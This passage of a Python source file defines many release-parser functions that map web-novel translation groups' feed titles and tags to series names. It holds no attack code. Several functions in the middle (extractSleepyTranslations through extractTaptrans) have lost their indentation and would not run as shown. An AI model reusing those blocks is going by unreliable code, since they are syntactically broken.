	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	tags = item['tags']
	for series in ('Yu Ren',
				'Chu Wang Fei',
				'Seven Unfortunate Lifetimes',
				'All Thanks to a Single Moment of Impulse',
				'White Calculation'):
		if series in tags:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	if ("demon wang's gold medal status favorite fei" in tags
			or title.startswith('DWGMSFF')
			or "demon's wang golden favorite fei" in tags):
		return buildReleaseMessage(item, "Demon Wang's Golden Favorite Fei", vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTrungNguyen(item):
	'''
	Release parser for 'Trung Nguyen'. Series are recognized by marker
	substrings in the post title (including an abbreviated variant).
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if ('Bringing the Farm to Live in Another World' in title
			or 'Bringing the Farm...' in title):
		return buildReleaseMessage(item, 'Bringing the Farm to Live in Another World', vol, chp, frag=frag, postfix=postfix)
	if 'The First Alchemist - Chap' in title:
		return buildReleaseMessage(item, 'The First Alchemist', vol, chp, frag=frag, postfix=postfix)
	return False
def extractRedDragonTranslations(item):
	'''
	Release parser for 'Red Dragon Translations'. One series is routed
	by tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'Kaettekite mo fantasy' in item['tags']:
		return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractThisWorldWork(item):
	'''
	Release parser for 'This World Work'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSandwichKingdom(item):
	'''
	Release parser for 'Sandwich Kingdom'. Each series is routed by a
	short tag; the tag → series-title mapping is scanned in order so the
	more specific 'kininaru...' tag wins over the bare 'Kininaru' one.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	routing = (
		('sougen no okite', 'Sougen no Okite ~Shii yatsu ga moteru, ii buzoku ni umarekawatta zo~'),
		('Q.Maou-sama A.Mamono', 'Q. Maou-sama no oshigoto wa? A. Mamono musume e no tanetsuke desu'),
		('kininaru kanojo wo tokoton okashi tsukusu hanshi', 'Kininaru Kanojo wo Totokon Okashi Tsukusu Hanashi'),
		('game sekai tenseishitara', 'After Reincarnating Into This Game World I Seemed to Have Taken Over the Control of Status'),
		('healing semen', 'Curing incurable disease with semen'),
		('Kininaru', 'Ki ni Naru Kanojo wo Tokoton Okashitsukusu Hanashi'),
	)
	for tag, series in routing:
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
def extractRinOtakuBlog(item):
	'''
	Release parser for 'RinOtakuBlog'. Two series are routed by tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	tags = item['tags']
	if 'Netooku Otoko' in tags:
		return buildReleaseMessage(item, 'Netooku Otoko no Tanoshii Isekai Boueki', vol, chp, frag=frag, postfix=postfix)
	if 'Sonohi Sekai ga Kawatta' in tags:
		return buildReleaseMessage(item, 'Sonohi Sekai ga Kawatta', vol, chp, frag=frag, postfix=postfix)
	return False
def extractTheNamed(item):
	'''
	Release parser for 'The Named'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTarableTranslations(item):
	'''
	Release parser for 'Tarable Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractReadMeTranslations(item):
	'''
	Release parser for 'Read Me Translations'. The feed abbreviates
	"Chapter" to "Chap.", which the shared parser does not understand,
	so the title is expanded before the numbering is extracted.
	'''
	expanded = item['title'].replace("My CEO Wife Chap.", "My CEO Wife Chapter")
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(expanded)
	if "preview" in item['title'].lower() or not (vol or chp or frag):
		return None
	if item['title'].startswith("My CEO Wife Chap. "):
		return buildReleaseMessage(item, 'Wo De Meinu Zongcai Laopo', vol, chp, frag=frag, postfix=postfix)
	return False
def extractTheAsianCult(item):
	'''
	Release parser for 'The Asian Cult'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPolyphonicStoryTranslationGroup(item):
	'''
	Release parser for 'Polyphonic Story Translation Group'. No series
	are mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPridesFamiliarsMaidens(item):
	'''
	Release parser for 'Pride's Familiars & Maidens'. No series are
	mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTheMustangTranslator(item):
	'''
	Release parser for 'The Mustang Translator'. One series is routed
	by its (identically-named) tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'The Six Immortals' in item['tags']:
		return buildReleaseMessage(item, 'The Six Immortals', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPopsiclete(item):
	'''
	Release parser for 'Popsiclete'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTurtleandHareTranslations(item):
	'''
	Release parser for 'Turtle and Hare Translations'. The series 'Time'
	is recognized by its CJK-annotated marker in either title or tags.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	marker = 'Time (对的时间对的人)'
	if marker in title or marker in item['tags']:
		return buildReleaseMessage(item, 'Time', vol, chp, frag=frag, postfix=postfix)
	return False
def extractSaberTranslations(item):
	'''
	Release parser for 'Saber Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRomanticDreamersSanctuary(item):
	'''
	Release parser for 'Romantic Dreamer's Sanctuary'. No series are
	mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTLSyosetsu(item):
	'''
	Release parser for 'TL Syosetsu'. 'Defiled Hero' releases are keyed
	on a case-insensitive title prefix.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if title.lower().strip().startswith('defiled hero chapter'):
		return buildReleaseMessage(item, 'Defiled Hero', vol, chp, frag=frag, postfix=postfix)
	return False
def extractQualideaofScumandaGoldCoin(item):
	'''
	Release parser for 'Qualidea of Scum and a Gold Coin'. No series are
	mapped for this source yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSoltarination(item):
	'''
	Release parser for 'Soltarination'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPlainlyBored(item):
	'''
	Release parser for 'Plainly Bored'. One series is recognized by a
	case-insensitive substring match on the title.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'empress with no virtue' in title.lower():
		return buildReleaseMessage(item, 'Empress with no Virtue', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTheDefendTranslations(item):
	'''
	Release parser for 'The Defend Translations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSlimeLv1(item):
	'''
	Release parser for 'Slime Lv1'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractUniversesWithMeaning(item):
	'''
	Release parser for 'Universes With Meaning'. Two OEL serials are
	recognized by marker substrings in the title.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'Angel of Death' in title:
		return buildReleaseMessage(item, 'Angel of Death', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'In The Name Of God' in title:
		return buildReleaseMessage(item, 'In The Name Of God', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOtomeRevolution(item):
	'''
	Release parser for 'Otome Revolution'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSleepyTranslations(item):
'''
# 'Sleepy Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTheIronTeeth(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractUndecentTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTenThousandHeavenControllingSword(item):
'''
# 'Ten Thousand Heaven Controlling Sword'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractTaptrans(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
return False
def extractRidwanTrans(item):
    """Parser for 'RidwanTrans' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'Isekai Meikyuu no Saishinbu wo Mezasou' in item['title']:
        # Titles may encode "Chapter X-Y"; take X.Y as chapter.fragment when
        # the generic parser did not already find a fragment.
        match = re.search(r'Chapter (\d+)\-(\d+)', item['title'], re.IGNORECASE)
        if match and not frag:
            chp, frag = int(match.group(1)), int(match.group(2))
        return buildReleaseMessage(item, 'Isekai Meikyuu no Saishinbu wo Mezasou', vol, chp, frag=frag, postfix=postfix)
    return False
def extractOyasumiReads(item):
    """Parser for 'Oyasumi Reads' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'ISEKAIJIN NO TEBIKISHO' in item['tags']:
        return buildReleaseMessage(item, 'Isekaijin no Tebikisho', vol, chp, frag=frag, postfix=postfix)
    return False
def extractUDonateWeTranslate(item):
    """Parser for 'U Donate We Translate' feed items (Against the Gods)."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp):
        return False
    tagged = 'ATG' in item['tags']
    titled = 'Against the Gods' in item['title'] and 'Chapter' in item['title']
    if tagged or titled:
        return buildReleaseMessage(item, 'Against the Gods', vol, chp, frag=frag, postfix=postfix)
    return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPiggyBottleTranslations(item):
    """Parser for 'PiggyBottle Translations' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if item['title'].lower().startswith('beseech the devil'):
        return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
    return False
def extractRumanshisLair(item):
    """Parser for "Rumanshi's Lair" feed items.

    Branch order matters: the first matching series wins.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    title = item['title']
    if "preview" in title.lower() or not (vol or chp):
        return False
    if title.startswith('Jobless'):
        return buildReleaseMessage(item, 'I Aim to Be an Adventurer with the Jobclass of "Jobless"', vol, chp, frag=frag, postfix=postfix)
    if 'The Harem Was a Forced Goal' in item['tags'] or 'THWAFG' in title:
        # "SS" posts are side stories; only label them when no other postfix
        # was parsed out of the title.
        if "SS" in title and not postfix:
            postfix = "Side Story"
        return buildReleaseMessage(item, 'The Harem Was a Forced Goal', vol, chp, frag=frag, postfix=postfix)
    if 'Isekai Cheat' in item['tags'] or 'Isekai Cheat' in title:
        return buildReleaseMessage(item, 'Different World Reincarnation ~ Enjoying the new world as a cheat ~', vol, chp, frag=frag, postfix=postfix)
    if 'Other Worlds Monster Breeder' in item['tags'] or 'Other World’s Monster Breeder (PokeGod)'.lower() in title.lower():
        return buildReleaseMessage(item, 'Other World\'s Monster Breeder', vol, chp, frag=frag, postfix=postfix)
    if 'When I returned home, what I found was fantasy!?'.lower() in title.lower():
        return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
    return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSpiritualTranscription(item):
    """Parser for 'Spiritual Transcription' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    tags = item['tags']
    if 'TEO' in tags or 'The Empyrean Overlord' in tags:
        return buildReleaseMessage(item, 'The Empyrean Overlord', vol, chp, frag=frag, postfix=postfix)
    return False
def extractPaztok(item):
    '''
    Parser for 'Paztok' (original English) feed items.
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    # Every other extractor in this file lower-cases the title before the
    # "preview" filter; this one previously matched case-sensitively, so
    # titles like "Preview ..." slipped through. Made consistent here.
    if not (chp or vol) or "preview" in item['title'].lower():
        return False
    # Derive a postfix from a "Title: subtitle" form when the generic parser
    # found none.
    if not postfix and ":" in item['title']:
        postfix = item['title'].split(":")[-1]
    if 'Paztok' in item['tags']:
        return buildReleaseMessage(item, 'Paztok', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslationTreasureBox(item):
    """Parser for 'Translation Treasure Box' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractRedLanternArchives(item):
    """Parser for 'Red Lantern Archives' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'Outaishihi ni Nante Naritakunai!!' in item['tags']:
        return buildReleaseMessage(item, 'Outaishihi ni Nante Naritakunai!!', vol, chp, frag=frag, postfix=postfix)
    return False
def extractTranslatingForYourPleasure(item):
    """Parser for 'Translating For Your Pleasure' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if "The Inverted Dragon's Scale" in item['tags']:
        return buildReleaseMessage(item, "The Inverted Dragon's Scale", vol, chp, frag=frag, postfix=postfix)
    return False
def extractSETSUNA86BLOG(item):
    """Parser for 'SETSUNA86BLOG' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractTryTranslations(item):
    """Parser for 'Try Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractTrinityArchive(item):
    """Parser for 'Trinity Archive' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'Summoned Slaughterer' in item['tags']:
        return buildReleaseMessage(item, 'Summoned Slaughterer', vol, chp, frag=frag, postfix=postfix)
    return False
def extractPielordTranslations(item):
    """Parser for 'Pielord Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractTwelveMonthsofMay(item):
    """Parser for 'Twelve Months of May' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    # Both the tag and the "Ostrich Chapter ..." title form map to the same
    # series.
    tagged = 'My Mister Ostrich' in item['tags']
    if tagged or item['title'].startswith("Ostrich Chapter"):
        return buildReleaseMessage(item, 'Wo De Tuo Niao Xian Sheng', vol, chp, frag=frag, postfix=postfix)
    return False
def extractUkel2x(item):
    """Parser for 'Ukel2x' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    lowered = item['title'].lower()
    if lowered.startswith('volume'):
        return buildReleaseMessage(item, 'Kokugensou wo Item Cheat de Ikinuku', vol, chp, frag=frag, postfix=postfix)
    if lowered.startswith('dungeon kurashi no moto yuusha chapter'):
        return buildReleaseMessage(item, 'Dungeon Kurashi No Moto Yuusha', vol, chp, frag=frag, postfix=postfix)
    if lowered.startswith('munivit anima chapter'):
        return buildReleaseMessage(item, 'Munivit Anima', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    return False
def extractRootOfEvil(item):
    """Parser for 'Root of Evil' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractStellarTransformationCon(item):
    """Parser for 'Stellar Transformation Con' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractUnnamedtranslations(item):
    """Parser for 'unnamedtranslations.blogspot.com' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractTusTrans(item):
    """Parser for 'TusTrans' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractTumbleIntoFantasy(item):
    """Parser for 'Tumble Into Fantasy' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractQualiTeaTranslations(item):
    """Parser for 'QualiTeaTranslations' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    # This tag is explicitly skipped (never reported as a release).
    if 'Harry Potter and the Rise of the Ordinary Person' in item['tags']:
        return None
    if 'Romance of Dragons and Snakes' in item['tags']:
        return buildReleaseMessage(item, 'Romance of Dragons and Snakes', vol, chp, frag=frag, postfix=postfix)
    return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSolstar24(item):
    """Parser for 'Solstar24' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    for tag, series in (('jin xiu wei yang', 'Jin Xiu Wei Yang'),
                        ('dao qing', 'Dao Qing')):
        if tag in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def extractSloth(item):
    """Parser for 'Sloth' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractUnlimitedNovelFailures(item):
    """Parser for 'Unlimited Novel Failures' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractRinkageTranslation(item):
    """Parser for 'Rinkage Translation' feed items.

    Tags are checked in order; the first match wins (the broader
    'Netooku Otoko' tag is deliberately checked after the full title tag).
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    series_by_tag = [
        ('Netooku Otoko no Tanoshii Isekai Boueki', 'Netooku Otoko no Tanoshii Isekai Boueki'),
        ('Atelier Tanaka', 'Atelier Tanaka'),
        ('Din No Monshou', 'Din No Monshou'),
        ('Netooku Otoko', 'Netooku Otoko no Tanoshii Isekai Boueki'),
        ('Yuusha Party', 'Yuusha Party ni Kawaii Ko ga Ita node, Kokuhaku Shitemita.'),
    ]
    for tag, series in series_by_tag:
        if tag in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def extractSelkinNovel(item):
    """Parser for 'Selkin Novel' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractStartlingSurprisesAtEveryStep(item):
    """Parser for 'Startling Surprises at Every Step' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'bu bu jing xin' in item['tags']:
        return buildReleaseMessage(item, 'Bu Bu Jing Xin', vol, chp, frag=frag, postfix=postfix)
    return False
def extractPathOfTranslation(item):
    """Parser for 'Path of Translation' feed items.

    Two series are identified by tag, the rest by title prefix; in every
    case the matched string is also the series name.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    for tag_name in ("Emperor's Domination", 'Big Life'):
        if tag_name in item['tags']:
            return buildReleaseMessage(item, tag_name, vol, chp, frag=frag, postfix=postfix)
    title_prefixes = (
        'Game Market 1983',
        'Spirit Vessel',
        'Instant Kill',
        'My Daoist Life',
        'Tales of the Reincarnated Lord',
    )
    for prefix in title_prefixes:
        if item['title'].startswith(prefix):
            return buildReleaseMessage(item, prefix, vol, chp, frag=frag, postfix=postfix)
    return False
def extractReincarnationTranslations(item):
    """Parser for 'Reincarnation Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractSakurane(item):
    """Parser for 'Sakurane' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if "Reincarnated as a Dragon's Egg" in item['tags']:
        return buildReleaseMessage(item, "Reincarnated as a dragon's egg ~Lets aim to be the strongest~", vol, chp, frag=frag, postfix=postfix)
    return False
def extractSoulPermutation(item):
    """Parser for 'Soul Permutation' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    for series in ('Elf-San with Master', 'Levelmaker'):
        if series in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def extractToriiTranslations(item):
    """Parser for 'Torii Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractTheUndyingCultivator(item):
    '''
    Parser for 'The Undying Cultivator' (original English) feed items.
    '''
    # Tags sometimes carry "arc N"; rewrite that to "volume N" and prepend it
    # to the title so the generic parser can pick up the volume number.
    volstr = str(item['tags']).lower().replace("arc ", "volume ")
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(volstr+item['title'])
    if not (chp or vol or frag) or "preview" in item['title'].lower():
        return None
    # Titles containing "N.M" encode chapter.fragment; override the generic
    # parse when present.
    # NOTE(review): \W requires a non-word character on BOTH sides, so a
    # "N.M" at the very start or end of the title will not match - confirm
    # whether that is intended.
    extract = re.search(r'\W(\d+)\.(\d+)\W', item['title'])
    if extract:
        chp = float(extract.group(1))
        frag = float(extract.group(2))
    if 'The Undying Cultivator' in item['tags']:
        return buildReleaseMessage(item, 'The Undying Cultivator', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
    return False
def extractPenguTaichou(item):
    """Parser for 'Pengu Taichou' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractPolarBearCatcher(item):
    """Parser for 'Polar Bear Catcher' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractPoorQualityTranslations(item):
    """Parser for 'Poor Quality Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractPumlated(item):
    """Parser for 'Pumlated' feed items.

    Skips previews and posts flagged as incomplete.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    lowered = item['title'].lower()
    if "preview" in lowered or "incomplete" in lowered or not (vol or chp or frag):
        return None
    if "(Um, Sorry!) I've been Reincarnated!" in item['tags']:
        return buildReleaseMessage(item, "(Um, Sorry!) I've been Reincarnated!", vol, chp, frag=frag, postfix=postfix)
    return False
def extractRainbowTurtleTranslations(item):
    """Parser for 'Rainbow Turtle Translations' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    for tag, series in (('LMS', 'Legendary Moonlight Sculptor'),
                        ('dungeon hunter', 'Dungeon Hunter'),
                        ('DKG', 'The Demon King\'s Game')):
        if tag in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def extractRiesTranslations(item):
    """Parser for 'Ries Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractRinveltHouse(item):
    """Parser for 'Rinvelt House' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractRogueApple(item):
    """Parser for 'Rogue Apple' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractRottenTranslations(item):
    """Parser for 'Rotten Translations' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractSabishiDesu(item):
    """Parser for 'sabishidesu.tk' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False


def extractSekainoKuroba(item):
    """Parser for 'Sekai no Kuroba' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractShalvationTranslations(item):
    """Parser for 'Shalvation Translations' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if 'Dungeon Defense' in item['tags']:
        return buildReleaseMessage(item, 'Dungeon Defense', vol, chp, frag=frag, postfix=postfix)
    return False
def extractShamelessOniisan(item):
    """Parser for 'Shameless Onii-san' feed items; no series are matched yet."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    return False
def extractShineTranslation(item):
    """Parser for 'Shine Translation' feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if "preview" in item['title'].lower() or not (vol or chp or frag):
        return None
    if item['title'].startswith('Invincible Level up '):
